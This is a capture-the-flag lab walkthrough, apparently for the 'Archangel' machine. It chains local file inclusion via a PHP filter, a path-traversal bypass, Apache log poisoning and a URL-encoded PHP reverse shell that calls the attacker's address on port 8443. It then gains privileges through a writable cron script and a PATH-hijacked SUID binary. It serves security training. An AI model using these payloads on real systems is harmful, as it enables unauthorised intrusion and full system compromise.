Target IP: 10.10.159.156
New IP after reverting: 10.10.83.159
A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.
There are two TCP ports open on the target machine: SSH and HTTP. I will start enumeration with the HTTP application on port 80.
Port 80: HTTP
The webpage above is displayed for this web application. I did not find anything useful when viewing the source-code of the webpage. The email support@mafialive.thm is interesting. Is mafialive.thm a VHOST? Adding this to the /etc/hosts file shows true.
Now browsing to http://mafialive.thm displays the webpage above.
Doing a directory search against this host with the command gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt shows the entries above. The test.php sounds interesting.
Browsing to this test.php displays the webpage above.
Pressing the button Here is a button displays the message above. A new URL parameter called view gets appended too.
I used ffuf to perform LFI fuzzing, but I did not find anything useful. However, I managed to read the source code of mrrobot.php using PHP filter. I should be able to read the test.php using this PHP filter.
And bingo! Using the payload http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php, I obtained the source-code of test.php in base64. Time to decode this.
And decoding the base64 string source-code of test.php shows the content above. There are two conditions set:
../..//var/www/html/development_testing
Time to create a payload to bypass this filtering in place. Using the payload http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log, I now have access to the access.log file for poisoning. I had to revert this machine as I tried poisoning this file and it did not work. The new IP for this machine is 10.10.83.159.
I poisoned the access.log file with the payload highlighted in the image above.
And success! Sending the commands id;whoami;ls returned the output above. Time to obtain a reverse shell connection.
Since the target machine is using PHP, I sent a PHP reverse shell script to obtain a reverse shell connection. I deployed the payload php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and recevied a reverse shell connection on my machine on port 8443. Now I have a foothold on the target machine.
Running the command find / -writable -type f 2>/dev/null shows the interesting entry /opt/helloworld.sh, as shown above.
And there is an interesting cronjob task with the name /opt/helloworld.sh that is executed as archangel. I have write privileges over it.
I put my bash reverse shell script inside helloworld.sh. Then I received a reverse shell connection with the session as archangel on my machine on port 8444. I successfully elevated my privileges horizontally as www-data to archangel.
The binary backup at /home/archangel/secret has SUID bit set, and the user archangel can execute it.
And running strings on this binary shows the interesting code above. It is copying the contents of home/user/archangel/myfiles/* to /opt/backupfiles. But the copy binary is used without absolute path, so I can create a malicious version of it.
I created a malicious version of the copy binary at tmp that invokes a reverse shell connection to my machine on port 8445. Then executing this binary backup, I received a root reverse shell connection on port 8445. Now I have root access.
The user.txt flag which is located at archangel home directory.
The user2.txt flag after gaining access to the target machine as archangel.
The root.txt flag.